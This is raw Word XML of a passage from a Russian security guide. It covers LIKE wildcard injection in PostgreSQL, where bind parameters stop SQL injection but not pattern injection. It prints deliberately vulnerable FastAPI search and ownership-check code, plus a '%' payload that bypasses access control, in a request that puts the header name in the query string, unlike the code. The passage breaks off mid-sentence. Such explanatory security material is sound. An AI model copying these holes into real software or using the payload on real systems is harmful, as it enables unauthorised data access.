    <w:p w14:paraId="7FD1C5FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.15.1 % и _ в LIKE без ESCAPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4FC09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL — pattern matching с двумя wildcards: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (zero-or-more characters) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (any single character). Когда приложение принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от пользователя и подставляет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name LIKE :search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через bind-параметр — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL-injection физически невозможна</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bind защищает от quote-escape), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pattern-semantics остаётся под контролем атакующего</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%admin%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсится как «всё, что содержит admin». Если приложение использует LIKE для проверки доступа (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE owner LIKE :session_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> матчит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>все строки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — auth bypass. Дополнительно: множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в длинном pattern на индексированной таблице создают DoS через quadratic match (PostgreSQL backtracking matcher).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D65B49F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CEF8F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/documents.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C315D2A"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3CCFFAC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D3D0E7"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0601DB07"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103C5C5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AFED77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635E956"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6D4572DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/documents/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C547456" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_documents(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFB805" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query(""),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63437B2B"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2ED91B6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE19A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Bind-параметр защищает от SQL-injection, но не от pattern-attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A516B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682291F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title, owner_id, created_at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A706D65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36217B15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE title ILIKE :pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7BA1BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF85940" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484CFAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"pattern": f"%{q}%"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66202179"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9B101EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pattern = f"%{q}%"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>само</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавляет окружающие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-wildcards (стандартный «contains»-поиск). Bind-параметр передаёт строку как values, но движок LIKE интерпретирует символы внутри. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>корректная защита от SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полная уязвимость к pattern injection</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A42C02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Второй пример — auth-check через LIKE (антипаттерн):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338F7B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/documents/{doc_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B83B053" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_document(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76102442" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    doc_id: int,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644BFC73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    current_user: str = Depends(get_current_user),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220A703"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49B3F2C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1774E00F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Антипаттерн: ownership check через LIKE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C46248" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB6541" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title, body, owner_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30686D9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31421BBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE id = :doc_id AND owner_id::text LIKE :user_filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F1D97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F1454" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # user_filter приходит из header или JWT-claim — не из login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BB8A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    user_filter = request.headers.get("X-User-Filter", current_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6B15C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"doc_id": doc_id, "user_filter": user_filter})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BEEB17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384DB4F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>X-User-Filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит от клиента (например, через прокси, который не очищает заголовок) — атакующий ставит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> документ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18231E1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164686CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант A — auth/access bypass через `%`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AADC7D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /documents/42?X-User-Filter=%25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7DEB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user_filter = "%"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86FB80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, body, owner_id FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B371D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = 42 AND owner_id::text LIKE '%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242E36AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> матчит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любое</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> значение (включая NULL? нет — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
